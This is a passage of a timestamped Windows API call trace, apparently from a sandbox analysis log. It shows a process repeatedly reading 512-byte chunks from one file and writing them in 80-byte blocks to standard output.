0x54 [0152.176] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ce418 | out: lpFileSizeHigh=0x2ce418*=0x0) returned 0x1632 [0152.176] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.176] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.177] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.177] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.178] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.178] GetFileType (hFile=0x4c) returned 0x1 [0152.178] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.178] GetFileType (hFile=0x4c) returned 0x1 [0152.178] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.178] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.179] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.179] GetFileType (hFile=0x4c) returned 0x1 [0152.179] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.179] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.179] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.179] GetFileType (hFile=0x4c) returned 0x1 [0152.179] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.179] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.180] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.180] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.180] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.180] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] GetFileType (hFile=0x4c) returned 0x1 [0152.181] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.181] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.182] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.182] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.182] GetFileType (hFile=0x4c) returned 0x1 [0152.182] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.183] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.183] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.183] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.183] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.184] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.184] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.184] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.184] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.185] GetFileType (hFile=0x4c) returned 0x1 [0152.185] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.186] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.186] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.186] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.186] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.187] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.187] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.187] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.187] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf2f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf2f0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf340*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf390*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf3e0*, lpNumberOfBytesWritten=0x2ce434*=0x50, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] GetFileType (hFile=0x4c) returned 0x1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.188] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf430*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf430*, lpNumberOfBytesWritten=0x2ce434*=0x20, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.188] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce420 | out: lpNewFilePointer=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=4) returned 0x54 [0152.188] ReadFile (in: hFile=0x54, lpBuffer=0x2cf250, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce440, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, lpNumberOfBytesRead=0x2ce440*=0x200, lpOverlapped=0x0) returned 1 [0152.188] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] GetFileType (hFile=0x4c) returned 0x1 [0152.189] _get_osfhandle (_FileHandle=1) returned 0x4c [0152.189] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce434, lpOverlapped=0x0 | out: lpBuffer=0x2cf250*, 